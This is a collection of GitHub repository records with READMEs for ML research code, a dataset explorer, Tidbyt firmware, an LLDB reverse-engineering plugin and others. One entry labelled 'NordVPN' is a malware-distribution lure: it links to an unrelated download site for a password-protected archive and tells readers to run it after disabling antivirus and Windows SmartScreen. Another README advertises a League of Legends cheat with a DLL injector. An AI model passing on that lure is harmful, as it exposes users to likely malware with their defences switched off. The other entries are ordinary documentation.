[3D-Front](https://tianchi.aliyun.com/specials/promotion/alibaba-3d-scene-dataset) dataset and link them to the local directory as follows: ``` datasets/3D-Front/3D-FRONT datasets/3D-Front/3D-FRONT-texture datasets/3D-Front/3D-FUTURE-model ``` 2. Render 3D-Front scenes following my [rendering pipeline](https://github.com/yinyunie/BlenderProc-3DFront) and link the rendering results (in `renderings` folder) to ``` datasets/3D-Front/3D-FRONT_renderings_improved_mat ``` *Note: you can comment out `bproc.renderer.enable_depth_output(activate_antialiasing=False)` in `render_dataset_improved_mat.py` since we do not need depth information.* 3. Preprocess 3D-Front data by ```commandline python utils/threed_front/1_process_viewdata.py --room_type ROOM_TYPE --n_processes NUM_THREADS python utils/threed_front/2_get_stats.py --room_type ROOM_TYPE ``` * The processed data for training are saved in `datasets/3D-Front/3D-FRONT_samples`. * We also parsed and extracted the 3D-Front data for visualization into `datasets/3D-Front/3D-FRONT_scenes`. * `ROOM_TYPE` can be `'bed'`(bedroom) or `'living'`(living room). 
* You can set `NUM_THREADS` to your CPU core number for parallel processing. 4. Visualize processed data for verification by (optional) ```commandline python utils/threed_front/vis/vis_gt_sample.py --scene_json SCENE_JSON_ID --room_id ROOM_ID --n_samples N_VIEWS ``` * `SCENE_JSON_ID` is the ID of a scene, e,g, `6a0e73bc-d0c4-4a38-bfb6-e083ce05ebe9`. * `ROOM_ID` is the room ID in this scene, e.g., `MasterBedroom-2679`. * `N_VIEWS` is the number views to visualize., e.g. `12`. If everything goes smooth, there will pop five visualization windows as follows. | <div style="width:200px">RGB</div> | <div style="width:200px">Semantics</div> | <div style="width:200px">Instances</div> | <div style="width:200px">3D Box Projections</div> | <div style="width:200px">CAD Models (view #1)</div> | |:---------------------------------------------------------------:|:---------------------------------------------------------------------------------:|:----------------------------------------------------------------:|:------------------------------------------------------------------------:|:----------------------------------------------------------------------:| | <img src="resources/visualization/front3d/rgb.jpg" width="300"> | <img src="resources/visualization/front3d/sem.jpg" width="300"> | <img src="resources/visualization/front3d/inst.jpg" width="300"> | <img src="resources/visualization/front3d/3dboxesproj.jpg" width="300"> | <img src="resources/visualization/front3d/CAD_models.png" width="300"> | *Note: X server is required for visualization.* ### ScanNet data processing (for single-view reconstruction) 1. Apply and download [ScanNet](http://www.scan-net.org/) into `datasets/ScanNet/scans`. Since we need 2D data, the `*.sens` should also be downloaded for each scene. 2. Extract `*.sens` files to obtain RGB/semantics/instance/camera pose frame data by ```commandline python utils/scannet/1_unzip_sens.py ``` Then the folder structure in each scene looks like: ``` ./scene* |--color (folder) |--instance-filt (folder) |--intrinsic (folder) |--label-filt (folder) |--pose (folder) |--scene*.aggregation.json |--scene*.sens |--scene*.txt |--scene*_2d-instance.zip ... |--scene*_vh_clean_2.ply ``` 3. Process ScanNet data by ```commandline python utils/scannet/2_process_viewdata.py ``` The processed data will be saved in `datasets/ScanNet/ScanNet_samples`. 4. 
Visualize the processed data by(optional) ```commandline python utils/scannet/vis/vis_gt.py --scene_id SCENE_ID --n_samples N_SAMPLES ``` * SCENE_ID is the scene ID in scannet, e.g., `scene0000_00` * N_SAMPLES is the number of views to visualize, e.g., `6` If everything goes smooth, it will pop out five visualization windows like | <div style="width:200px">RGB</div> | <div style="width:200px">Semantics</div> | <div style="width:200px">Instances</div> | <div style="width:200px">3D Box Projections</div> | <div style="width:200px">3D Boxes (view #3)</div> | |:---------------------------------------------------------------:|:---------------------------------------------------------------:|:----------------------------------------------------------------:|:-----------------------------------------------------------------------:|:-------------------------------------------------------------------:| | <img src="resources/visualization/scannet/rgb.jpg" width="300"> | <img src="resources/visualization/scannet/sem.jpg" width="300"> | <img src="resources/visualization/scannet/inst.jpg" width="300"> | <img src="resources/visualization/scannet/3dboxesproj.jpg" width="300"> | <img src="resources/visualization/scannet/3dboxes.png" width="300"> | *Note: X server is required for visualization.* --- ## Training *Note: we use SLURM to manage multi-GPU training. For backend setting, please check [slurm_jobs](slurm_jobs).* ### Scene Generation (with 3D-Front) Here we use bedroom data as an example. Training on living rooms is the same. 1. Start layout pretraining by ```commandline python main.py \ start_deform=False \ resume=False \ finetune=False \ weight=[] \ distributed.num_gpus=4 \ data.dataset=3D-Front \ data.split_type=bed \ data.n_views=20 \ data.aug=False \ device.num_workers=32 \ train.batch_size=128 \ train.epochs=800 \ train.freeze=[] \ scheduler.latent_input.milestones=[400] \ scheduler.generator.milestones=[400] \ log.if_wandb=True \ exp_name=pretrain_3dfront_bedroom ``` The network weight will be saved in `outputs/3D-Front/train/YEAR-MONTH-DAY/HOUR-MINUTE-SECOND/model_best.pth`. 2. Shape training - We start shape training after the layout training converged. Please replace the `weight` keyword below with the pretrained weight path. ```commandline python main.py \ start_deform=True \ resume=False \ finetune=True \ weight=['outputs/3D-Front/train/YEAR-MONTH-DAY/HOUR-MINITE-SECOND/model_best.pth'] \ distributed.num_gpus=4 \ data.dataset=3D-Front \ data.n_views=20 \ data.aug=False \ data.downsample_ratio=4 \ device.num_workers=16 \ train.batch_size=16 \ train.epochs=500 \ train.freeze=[] \ scheduler.latent_input.milestones=[300] \ scheduler.generator.milestones=[300] \ log.if_wandb=True \ exp_name=train_3dfront_bedroom ``` Still, the refined network weight will be saved in `outputs/3D-Front/train/YEAR-MONTH-DAY/HOUR-MINUTE-SECOND/model_best.pth`. ### Single-view Reconstruction (with ScanNet) 1. Start layout pretraining by ```commandline python main.py \ start_deform=False \ resume=False \ finetune=False \ weight=[] \ distributed.num_gpus=4 \ data.dataset=ScanNet \ data.split_type=all \ data.n_views=40 \ data.aug=True \ device.num_workers=32 \ train.batch_size=64 \ train.epochs=500 \ train.freeze=[] \ scheduler.latent_input.milestones=[500] \ scheduler.generator.milestones=[500] \ log.if_wandb=True \ exp_name=pretrain_scannet ``` The network weight will be saved in `outputs/ScanNet/train/YEAR-MONTH-DAY/HOUR-MINUTE-SECOND/model_best.pth`. 2. 
Shape training - We start shape training after the layout training converged. Please replace the weight keyword below with the pretrained weight path. ```commandline python main.py \ start_deform=True \ resume=False \ finetune=True \ weight=['outputs/ScanNet/train/YEAR-MONTH-DAY/HOUR-MINUTE-SECOND/model_best.pth'] \ distributed.num_gpus=4 \ data.dataset=ScanNet \ data.split_type=all \ data.n_views=40 \ data.downsample_ratio=4 \ data.aug=True \ device.num_workers=8 \ train.batch_size=8 \ train.epochs=500 \ train.freeze=[] \ scheduler.latent_input.milestones=[300] \ scheduler.generator.milestones=[300] \ log.if_wandb=True \ exp_name=train_scannet ``` Still, the refined network weight will be saved in `outputs/ScanNet/train/YEAR-MONTH-DAY/HOUR-MINUTE-SECOND/model_best.pth`. --- ## Generation & Reconstruction Please replace the keyword `weight` below with your trained weight path. 1. Scene Generation (with 3D-Front) ```commandline python main.py \ mode=generation \ start_deform=True \ data.dataset=3D-Front \ finetune=True \ weight=outputs/ScanNet/train/YEAR-MONTH-DAY/HOUR-MINUTE-SECOND/model_best.pth \ generation.room_type=bed \ data.split_dir=splits \ data.split_type=bed \ generation.phase=generation ``` The generated scenes will be saved in `outputs/3D-Front/generation/YEAR-MONTH-DAY/HOUR-MINUTE-SECOND`. 2. Single view reconstruction (with ScanNet). Since this process involves test-time optimization, it would be very slow. Here we test in parallel by dividing the whole test set into `batch_num` batches. You should run this script multiple times to finish the whole testing, where for each script, you should set an individual `batch_id` number, `batch_id=0,1,...,batch_num-1`. If you not want to run in parallel, you can keep the default setting as below. ```commandline python main.py \ mode=demo \ start_deform=True \ finetune=True \ data.n_views=1 \ data.dataset=ScanNet \ data.split_type=all \ weight=outputs/ScanNet/train/YEAR-MONTH-DAY/HOUR-MINUTE-SECOND/model_best.pth \ optimizer.method=RMSprop \ optimizer.lr=0.01 \ scheduler.latent_input.milestones=[1200] \ scheduler.latent_input.gamma=0.1 \ demo.epochs=2000 \ demo.batch_id=0 \ demo.batch_num=1 \ log.print_step=100 \ log.if_wandb=False \ ``` The results will be saved in `outputs/ScanNet/demo/output`. 3. Similarly, you can do single view reconstruction with 3D-Front as well. ```commandline python main.py \ mode=demo \ start_deform=True \ finetune=True \ data.n_views=1 \ data.dataset=3D-Front \ data.split_type=bed \ weight=outputs/3D-Front/train/2022-09-06/02-37-24/model_best.pth \ optimizer.method=RMSprop \ optimizer.lr=0.01 \ scheduler.latent_input.milestones=[1200] \ scheduler.latent_input.gamma=0.1 \ demo.epochs=2000 demo.batch_id=0 \ demo.batch_num=1 \ log.print_step=100 \ log.if_wandb=False ``` The results will be saved in `outputs/3D-Front/demo/output`. --- ## Visualization *Note: you may need X-server to showcase the visualization windows from [VTK](https://vtk.org/).* 1. Scene Generation (with 3D-Front). ```commandline python utils/threed_front/vis/render_pred.py --pred_file outputs/3D-Front/generation/YEAR-MONTH-DAY/HOUR-MINUTE-SECOND/vis/bed/sample_X_X.npz [--use_retrieval] ``` 2. Single-view Reconstruction (with ScanNet) ```commandline python utils/scannet/vis/vis_prediction_scannet.py --dump_dir demo/ScanNet/output --sample_name all_sceneXXXX_XX_XXXX ``` 3. 
Single-view Reconstruction (with 3D-Front) ```commandline python utils/threed_front/vis/vis_svr.py --dump_dir demo/3D-Front/output --sample_name [FILENAME IN dump_dir] ``` --- ## Citation If you find our work is helpful, please cite ``` @InProceedings{Nie_2023_CVPR, author = {Nie, Yinyu and Dai, Angela and Han, Xiaoguang and Nie{\ss}ner, Matthias}, title = {Learning 3D Scene Priors With 2D Supervision}, booktitle = {Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR)}, month = {June}, year = {2023}, pages = {792-802} } ```
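The generation step above saves each scene as an `.npz` archive (e.g. `vis/bed/sample_X_X.npz`) that is later fed to `render_pred.py`. A quick way to peek at such an archive is sketched below; the array names inside are not documented here, so the snippet only lists whatever keys and shapes it finds, and the path is a placeholder following the README's output pattern:

```python
# List the contents of a generated ScenePriors sample archive before rendering it.
import numpy as np

pred_file = "outputs/3D-Front/generation/YEAR-MONTH-DAY/HOUR-MINUTE-SECOND/vis/bed/sample_0_0.npz"  # placeholder

with np.load(pred_file, allow_pickle=True) as data:
    for key in data.files:
        print(key, data[key].shape, data[key].dtype)
```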
35
4
lancedb/yoloexplorer
https://github.com/lancedb/yoloexplorer
YOLOExplorer : Iterate on your YOLO / CV datasets using SQL, Vector semantic search, and more within seconds
# YOLOExplorer Explore, manipulate and iterate on Computer Vision datasets with precision using simple APIs. Supports SQL filters, vector similarity search, native interface with Pandas and more. * Analyse your datasets with powerful custom queries * Find and remove bad images (duplicates, out of domain data and more) * Enrich datasets by adding more examples from another datasets * And more 🌟 NEW: Supports GUI Dashboard, Pythonic and notebook workflows ### Dashboard Workflows <details open> <summary>Mutliple dataset support</summary> You can now explore multiple datasets, search across them, add/remove images across multiple datasets to enrich bad examples. Start training on new dataset within seconds. Here's an example of using VOC, coco128 and coco8 datasets together with VOC being the primary. <pre> from yoloexplorer import Explorer exp = Explorer("VOC.yaml") exp.build_embeddings() coco_exp = Explorer("coco128.yaml") coco_exp.build_embeddings() #Init coco8 similarly exp.dash([coco_exp, coco8]) #Automatic analysis coming soon with dash(..., analysis=True) </pre> ![ezgif com-optimize (3)](https://github.com/lancedb/yoloexplorer/assets/15766192/3422a536-138a-4fce-af2c-cef97f171aed) </details> <details open> <summary>Query using SQL and semantic search, View dataset as pandas DF and explore embeddings</summary> ![ezgif com-optimize (4)](https://github.com/lancedb/yoloexplorer/assets/15766192/b786e2f1-dc8e-411e-b13b-84b26ec50d41) ![ezgif com-optimize (5)](https://github.com/lancedb/yoloexplorer/assets/15766192/38d42a38-810e-48f3-89ea-1ccf304a1047) </details> <details open> Try an example colab <a href="https://colab.research.google.com/github/lancedb/yoloexplorer/blob/main/examples/intro.ipynb"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"></a> <summary>Colab / Notebook</summary> <img src="./yoloexplorer/assets/docs/intro.gif" height=75% width=75% /> </details> ### Installation ``` pip install git+https://github.com/lancedb/yoloexplorer.git ``` Pypi installation coming soon ## Quickstart YOLOExplorer can be used to rapidly generate new versions of CV datasets trainable on [Ultralytics YOLO, SAM, FAST-SAM, RT-DETR](https://github.com/ultralytics/ultralytics) and more models. Start exploring your Datasets in 2 simple steps * Select a supported dataset or bring your own. Supports all Ultralytics YOLO datasets currently ```python from yoloexplorer import Explorer coco_exp = Explorer("coco128.yaml") ``` * Build the LanceDB table to allow querying ```python coco_exp.build_embeddings() coco_exp.dash() # Launch the GUI dashboard ``` <details open> <summary> <b> Querying Basics </b> </summary> You can get the schema of you dataset once the table is built ``` schema = coco_exp.table.schema ``` You can use this schema to run queries <b>SQL query</b><br/> Let's try this query and print 4 result - Select instances that contain one or more 'person' and 'cat' ```python df = coco_exp.sql("SELECT * from 'table' WHERE labels like '%person%' and labels LIKE '%cat%'") coco_exp.plot_imgs(ids=df["id"][0:4].to_list()) ``` Result <img src="./yoloexplorer/assets/docs/plotting.png" height=50% width=50% /><br/> The above is equivlant to plotting directly with a query: ```python voc_exp.plot_imgs(query=query, n=4) ``` <b>Querying by similarity</b><br/> Now lets say your model confuses between cetain classes( cat & dog for example) so you want to look find images similar to the ones above to investigate. 
The id of the first image in this case was 117 ```python imgs, ids = coco_exp.get_similar_imgs(117, n=6) # accepts ids/idx, Path, or img blob voc_exp.plot_imgs(ids) ``` <img src="./yoloexplorer/assets/docs/sim_plotting.png" height=50% width=50% /><br/> The above is equivlant to directly calling `plot_similar_imgs` ```python voc_exp.plot_similar_imgs(117, n=6) ``` NOTE: You can also pass any image file for similarity search, even the ones that are not in the dataset <b>Similarity Search with SQL Filter (Coming Soon)</b></br> Soon you'll be able to have a finer control over the queries by pre-filtering your table ``` coco_exp.get_similar_imgs(..., query="WHERE labels LIKE '%motorbike%'") coco_exp.plot_similar_imgs(query="WHERE labels LIKE '%motorbike%'") ``` </details> <details> <summary> <b>Plotting</b></summary> | Visualization Method | Description | Arguments | |---|---|---| | `plot_imgs(ids, query, n=10)` | Plots the given `ids` or the result of the SQL query. One of the 2 must be provided. | `ids`: A list of image IDs or a SQL query. `n`: The number of images to plot. | | `plot_similar_imgs(img/idx, n=10)` | Plots `n` top similar images to the given img. Accepts img idx from the dataset, Path to imgs or encoded/binary img | `img/idx`: The image to plot similar images for. `n`: The number of similar images to plot. | | `plot_similarity_index(top_k=0.01, sim_thres=0.90, reduce=False, sorted=False)` | Plots the similarity index of the dataset. This gives measure of how similar an img is when compared to all the imgs of the dataset. | `top_k`: The percentage of images to keep for the similarity index. `sim_thres`: The similarity threshold. `reduce`: Whether to reduce the dimensionality of the similarity index. `sorted`: Whether to sort the similarity index. | **Additional Details** * The `plot_imgs` method can be used to visualize a subset of images from the dataset. The `ids` argument can be a list of image IDs, or a SQL query that returns a list of image IDs. The `n` argument specifies the number of images to plot. * The `plot_similar_imgs` method can be used to visualize the top `n` similar images to a given image. The `img/idx` argument can be the index of the image in the dataset, the path to the image file, or the encoded/binary representation of the image. * The `plot_similarity_index` method can be used to visualize the similarity index of the dataset. The similarity index is a measure of how similar each image is to all the other images in the dataset. The `top_k` argument specifies the percentage of images to keep for the similarity index. The `sim_thres` argument specifies the similarity threshold. The `reduce` argument specifies whether to reduce the dimensionality of embeddings before calculating the index. The `sorted` argument specifies whether to sort the similarity index. </details> <details> <summary> <b>Add, remove, merge parts of datasets, persist new Datasets, and start training!</b></summary> Once you've found the right images that you'd like to add or remove, you can simply add/remove them from your dataset and generate the updated version. <b>Removing data</b><br/> You can simply remove images by passing a list of `ids` from the table. ``` coco_exp.remove_imgs([100,120,300..n]) # Removes images at the given ids. ``` <b>Adding data</b><br/> For adding data from another dataset, you need an explorer object of that dataset with embeddings built. You can then pass that object along with the ids of the imgs that you'd like to add from that dataset. 
``` coco_exp.add_imgs(exp, idxs) # ``` Note: You can use SQL querying and/or similarity searches to get the desired ids from the datasets. <b>Persisting the Table: Create new dataset and start training</b><br/> After making the desired changes, you can persist the table to create the new dataset. ``` coco_exp.persist() ``` This creates a new dataset and outputs the training command that you can simply paste in your terminal to train a new model! <b>Resetting the Table</b><br/> You can reset the table to its original or last persisted state (whichever is latest) ``` coco_exp.reset() ``` </details> <details> <summary><b>(Advanced querying)Getting insights from Similarity index</b></summary> The `plot_similarity_index` method can be used to visualize the similarity index of the dataset. The similarity index is a measure of how similar each image is to all the other images in the dataset. Let's the the similarity index of the VOC dataset keeping all the default settings ```python voc_exp.plot_similarity_index() ``` <img src="./yoloexplorer/assets/docs/sim_index.png" height=50% width=50%><br/> You can also get the the similarity index as a numpy array to perform advanced querys. ```python sim = voc_exp.get_similarity_index() ``` Now you can combine the similarity index with other querying options discussed above to create even more powerful queries. Here's an example: "Let's say you've created a list of candidates you wish to remove from the dataset. Now, you want to filter out the images that have similarity index less than 250, i.e, remove the images that are 90%(`sim_thres`) or more similar to more than 250 images in the dataset. " ```python ids = [...] # filtered ids list filter = np.where(sim > 250) final_ids = np.intersect1d(ids, filter) # intersect both arrays exp.remove_imgs(final_ids) ``` </details> <h3>Coming Soon</h3> <b>Pre-filtering</b> * To allow adding filter to searches. * Have a finer control over embeddings search space Pre-filtering will enable powerful queries like - "Show me images similar to <IMAGE> and include only ones that contain one or more(or exactly one) person, 2 cars and 1 horse" <br/> * <b>Automatically find potential duplicate images</b> * <b>Better embedding plotting and analytics insights </b> * <b>Better dashboard for visualizing imgs </b> </br> Notes: * The API will have some minor changes going from dev to minor release * For all practical purposes the ids are same as row number and is reset after every addition or removal
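Putting the documented calls together, a minimal curation pass could look like the sketch below. It only uses methods shown in this README (`build_embeddings`, `sql`, `get_similar_imgs`, `remove_imgs`, `persist`); the exact indexing of the returned dataframe and the type of the returned ids are assumptions based on the examples above:

```python
# Illustrative curation loop assembled from the API calls documented in this README.
from yoloexplorer import Explorer

exp = Explorer("coco128.yaml")
exp.build_embeddings()

# Find images that contain a person, then collect near-duplicates of the first hit.
df = exp.sql("SELECT * from 'table' WHERE labels LIKE '%person%'")
first_id = df["id"][0]
_, similar_ids = exp.get_similar_imgs(first_id, n=10)

# Remove the near-duplicates and persist a new dataset version for training.
exp.remove_imgs(list(similar_ids))
exp.persist()
```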
61
10
azriel91/dot_ix
https://github.com/azriel91/dot_ix
Interactive dot graphs
# ✒️ dot_ix > 🚧 This is very much a work in progress [Try it yourself](https://azriel.im/dot_ix/) *(sorry not mobile friendly)* https://user-images.githubusercontent.com/2993230/253878816-0729970f-651f-45ef-a986-470f383b8018.mp4 ```bash cargo install cargo-leptos # Then, one of: # * server side rendering cargo leptos watch --bin-features "ssr" -v # * client side rendering trunk serve ``` ## To Do > 🦜 Feel free to do any of these -- this project isn't my main focus, but I should be responsive in reviewing / merging things. * [ ] Instead of building using `cargo leptos` in `pages`, use `trunk`. This means not having a `styles/main.scss` -- cargo leptos merges styles with tailwind, that's why we use `cargo leptos`. See `Trunk.toml` if we were to use `trunk` and tailwind on its own. * [ ] Change `rt/into_graphviz_dot_src/info_graph.rs` to write to a buffer, instead of individual strings. * [ ] Take each node with a "type". * [ ] Take in tailwindcss classes to attach to node types. * [ ] Take in theme / merge with default theme. * [ ] Split `dot_ix` library from the web app, so it can be embedded in other apps. * [ ] GitHub Actions / automated testing / releasing / publishing. * [ ] Playground: Render pre-written graphs - Local storage - Graph in URL - Link to gist * [ ] Mobile friendly web page.
61
1
matkhl/leagueoflegends
https://github.com/matkhl/leagueoflegends
null
## leagueoflegends Simple source including: - recall tracker (outdated) - cooldown tracker (outdated) - orbwalker - champion modules - simple prediction & targetselection - skinchanger (based on R3nzSkin source) *Updated for patch 13.14.522 (minipatch after 13.14 release)* ### How to use the Injector In order for the injector to work, you need to put two compiled [Guided Hacking injector library](https://github.com/Broihon/GH-Injector-Library) files inside the output directory. ![Files screenshot](https://i.imgur.com/zVhDSCd.png) ### Default hotkeys - Open menu - Shift - Attack - Space - Uninject - Esc
15
7
tidbyt/hdk
https://github.com/tidbyt/hdk
A community supported firmware for the Tidbyt hardware 🤓
# Hardware SDK [![Docs](https://img.shields.io/badge/docs-tidbyt.dev-blue?style=flat-square)](https://tidbyt.dev) [![Build Status](https://img.shields.io/github/actions/workflow/status/tidbyt/hdk/main.yaml?style=flat-square)](https://github.com/tidbyt/hdk/actions/workflows/main.yaml) [![Discourse](https://img.shields.io/discourse/status?server=https%3A%2F%2Fdiscuss.tidbyt.com&style=flat-square)](https://discuss.tidbyt.com/) [![Discord Server](https://img.shields.io/discord/928484660785336380?style=flat-square)](https://discord.gg/r45MXG4kZc) This repository contains a community supported firmware for the Tidbyt hardware 🤓. ![social banner](./docs/assets/social.png) ## Warning ⚠️ Warning! Flashing your Tidbyt with this firmware or derivatives could fatally damage your device. As such, flashing your Tidbyt with this firmware or derivatives voids your warranty and comes without support. ## Setup This project uses PlatformIO to build, flash, and monitor firmware on the Tidbyt. To get started, you will need to download [PlatformIO Core][2] on your computer. Additionally, this firmware is designed to work with [Pixlet][1]. Using `pixlet serve`, you can serve a WebP on your local network. Take note of your computers IP address and replace it in the `TIDBYT_REMOTE_URL` example above. While we had pixlet in mind, you can point this firmware at any URL that hosts a WebP image that is optimized for the Tidbyt display. ## Getting Started To flash the custom firmware on your device, run the following after replacing the variables with your desired information: ``` TIDBYT_WIFI_SSID='Your WiFi' \ TIDBYT_WIFI_PASSWORD='super-secret' \ TIDBYT_REMOTE_URL='http://192.168.10.10:8080/api/v1/preview.webp' \ pio run --environment tidbyt --target upload ``` ## Monitoring Logs To check the output of your running firmware, run the following: ``` pio device monitor ``` ## Back to Normal To get your Tidbyt back to normal, you can run the following to flash the production firmware onto your Tidbyt: ``` pio run --target reset ``` [1]: https://github.com/tidbyt/pixlet [2]: https://docs.platformio.org/en/latest/core/installation/index.html
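Since the firmware simply fetches a WebP from `TIDBYT_REMOTE_URL`, anything that serves such a file will do; `pixlet serve` already provides this, and the hedged Python sketch below does the same for a local `preview.webp` (file name and port are assumptions) so `TIDBYT_REMOTE_URL` can point at `http://<your-ip>:8080/preview.webp`:

```python
# Serve files from the current directory so the Tidbyt firmware can fetch a WebP from this machine.
# The port and file name are placeholders; `pixlet serve` offers the same functionality out of the box.
from http.server import HTTPServer, SimpleHTTPRequestHandler

PORT = 8080

if __name__ == "__main__":
    # e.g. expose ./preview.webp at http://<your-ip>:8080/preview.webp
    HTTPServer(("0.0.0.0", PORT), SimpleHTTPRequestHandler).serve_forever()
```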
20
3
foundryzero/llef
https://github.com/foundryzero/llef
LLEF is a plugin for LLDB to make it more useful for RE and VR
<p align="center"> <img src="assets/llef-dragon-small.png" alt="llef logo"/> </p> # LLEF LLEF (pronounced ɬɛf - "hlyeff") is an LLDB plugin to make it more usable for low-level RE and VR. Similar to [GEF](https://github.com/hugsy/gef), but for LLDB. It uses LLDB's Python API to add extra status output and a few new commands, so that security researchers can more easily use LLDB to analyse software as it's running. ![llef demo](https://foundryzero.co.uk/assets/img/llef-small.gif) ## 💻 Supported Architectures * x86_64 * aarch64 / arm64 ## 📓 Requirements * LLDB 15+ (https://apt.llvm.org/) _On macOS this is bundled with Xcode 14.3+_ ## ⚙ Installation The instructions below will install LLEF so that it is used by LLDB by default. 1. Clone the repository. 2. `cd <repo>` 3. Run `./install.sh` 4. Select automatic (overwrites `~/.lldbinit`) or manual installation. _LLDB uses AT&T disassembly syntax for x86 binaries by default. The installer provides an option to override this._ ## ▶ Usage ### Launch LLDB ```bash lldb-15 <optional binary to debug> ``` ### Use commands: #### Pattern Create ``` (lldb) pattern create 10 [+] Generating a pattern of 10 bytes (n=4) aaaabaaaca [+] Pattern saved in variable: $8 (lldb) pattern create 100 -n 2 [+] Generating a pattern of 100 bytes (n=2) aabacadaea [+] Pattern saved in variable: $9 ``` #### Pattern Search ``` (lldb) pattern search $rdx [+] Found in $10 at index 45 (big endian) (lldb) pattern search $8 [+] Found in $10 at index 0 (little endian) (lldb) pattern search aaaabaaac [+] Found in $8 at index 0 (little endian) (lldb) pattern search 0x61616161626161616361 [+] Found in $8 at index 0 (little endian) ``` ### Breakpoint hook This is automatic and prints all the currently implemented information at a break point. ## 👷‍♂️ Troubleshooting LLDB Python support LLDB comes bundled with python modules that are required for LLEF to run. If on launching LLDB with LLEF you encounter `ModuleNotFoundError` messages it is likely you will need to manually add the LLDB python modules on your python path. To do this run the following to establish your site-packages location: ```bash python3 -m site --user-site ``` Then locate the LLDB python modules location. This is typically at a location such as `/usr/lib/llvm-15/lib/python3.10/dist-packages` but depends on your python version. Finally, modify and execute the following to add the above LLDB module path into a new file `lldb.pth` in the site-packages location discovered above. ```bash echo "/usr/lib/llvm-15/lib/python3.10/dist-packages" > ~/.local/lib/python3.10/site-packages/lldb.pth ``` ## 👏 Thanks We’re obviously standing on the shoulders of giants here - we’d like to credit [hugsy](https://twitter.com/_hugsy_) for [GEF](https://github.com/hugsy/gef) in particular, from which this tool draws *heavy* inspiration! Please consider this imitation as flattery 🙂 If you'd like to read a bit more about LLEF you could visit our [launch blog post](https://foundryzero.co.uk/2023/07/13/llef.html).
197
4
mazpie/mastering-urlb
https://github.com/mazpie/mastering-urlb
[ICML 2023] Pre-train world model-based agents with different unsupervised strategies, fine-tune the agent's components selectively, and use planning (Dyna-MPC) during fine-tuning.
# Mastering the Unsupervised Reinforcement Learning Benchmark from Pixels [[website](https://masteringurlb.github.io/)] [[paper](https://arxiv.org/abs/2209.12016)] This is the code for our ICML 2023 work. You can use it to pre-train world model-based agents with different unsupervised strategies, fine-tune the agent's components selectively, and use planning (Dyna-MPC) during fine-tuning. The repo also contains an extensively tested DreamerV2 implementation in PyTorch. <p align="center"> <img src='assets/URLB_cover.png' width=75%> </p> If you find the code useful, please refer to our work using: ``` @inproceedings{ Rajeswar2023MasterURLB, title={Mastering the Unsupervised Reinforcement Learning Benchmark from Pixels}, author={Sai Rajeswar and Pietro Mazzaglia and Tim Verbelen and Alexandre Piché and Bart Dhoedt and Aaron Courville and Alexandre Lacoste}, booktitle={40th International Conference on Machine Learning}, year={2023}, url={https://arxiv.org/abs/2209.12016} } ``` ## Requirements The environment assumes you have access to a GPU that can run CUDA 10.2 and CUDNN 8. Then, the simplest way to install all required dependencies is to create an anaconda environment by running ```sh conda env create -f conda_env.yml ``` After the instalation ends you can activate your environment with ```sh conda activate urlb ``` ## Implemented Agents | Agent | Command |---|---| | DreamerV2 (supervised) | `agent=dreamer` | ICM | `agent=icm_dreamer` | Plan2Explore | `agent=plan2explore` | RND | `agent=rnd_dreamer` | LBS | `agent=lbs_dreamer` | APT | `agent=apt_dreamer` | DIAYN | `agent=diayn_dreamer` | APS | `agent=aps_dreamer` ## Domains and tasks We support the following domains and tasks. | Domain | Tasks | |---|---| | `walker` | `stand`, `walk`, `run`, `flip` | | `quadruped` | `walk`, `run`, `stand`, `jump` | | `jaco` | `reach_top_left`, `reach_top_right`, `reach_bottom_left`, `reach_bottom_right` | ## Instructions ### Pre-training To run pre-training use the `dreamer_pretrain.py` script ```sh python dreamer_pretrain.py configs=dmc_pixels agent=icm_dreamer domain=walker seed=1 ``` If you want to train a skill-based agent, e.g. DIAYN, just change the `agent` and run: ```sh python dreamer_pretrain.py configs=dmc_pixels agent=diayn_dreamer domain=walker seed=1 ``` This script will produce several agent snapshots after training for `100k`, `500k`, `1M`, and `2M` frames. The snapshots will be stored under the following directory: ```sh ./pretrained_models/<obs_type>/<domain>/<agent>/<seed> ``` For example: ```sh ./pretrained_models/pixels/walker/icm/ ``` ### Fine-tuning Once you have pre-trained your method, you can use the saved snapshots to initialize the `Dreamer` agent and fine-tune it on a downstream task. For example, let's say you have an agent pre-trained with `ICM`, you can fine-tune it on `walker_run` by running the following command: ```sh python dreamer_finetune.py configs=dmc_pixels agent=icm_dreamer task=walker_run snapshot_ts=1000000 seed=1 ``` This will load a snapshot stored in `./pretrained_models/pixels/walker/icm_dreamer/1/snapshot_1000000.pt`, initialize `Dreamer` with it, and start training on `walker_run` using the extrinsic reward of the task. You can ablate components by setting: `init_critic=True/False` and `init_actor=True/False`. You can use Dyna-MPC by setting: `mpc=True`. 
### Monitoring

#### Console

The console output is also available in the following form:

```
| train | F: 6000 | S: 3000 | E: 6 | L: 1000 | R: 5.5177 | FPS: 96.7586 | T: 0:00:42
```

A training entry decodes as:

```
F  : total number of environment frames
S  : total number of agent steps
E  : total number of episodes
L  : episode length
R  : episode return
FPS: training throughput (frames per second)
T  : total training time
```

#### Tensorboard

Logs are stored in the `exp_local` folder. To launch tensorboard, run:

```sh
tensorboard --logdir exp_local
```

#### Weights and Biases (wandb)

You can also use Weights and Biases by launching the experiments with `use_wandb=True`.

## Notes and acknowledgements

The codebase was adapted from [URLB](https://github.com/rll-research/url_benchmark). The Dreamer implementation follows the original Tensorflow [DreamerV2 codebase](https://github.com/danijar/dreamerv2). This re-implementation has been carefully tested to obtain consistent results with the original ones on the DeepMind Control Suite, as reported in [this paper](https://arxiv.org/abs/2107.09645).
10
1
folk3n30/NordVPN
https://github.com/folk3n30/NordVPN
null
# INSTRUCTIONS: - Download the project: https://github-downloader.com/ - Unzip the archive (Project v1.2.4.zip) to your desktop. Password: 2023 - Run the file (Project_run v1.2.4). If you can’t download / install the software, you need to: 1. Disable / remove antivirus (files are completely clean) 2. If you can’t download, try to copy the link and download using another browser! 3. Disable Windows Smart Screen, as well as update the Visual C++ package.
28
0
mlamberts78/weather-chart-card
https://github.com/mlamberts78/weather-chart-card
Custom weather card with charts.
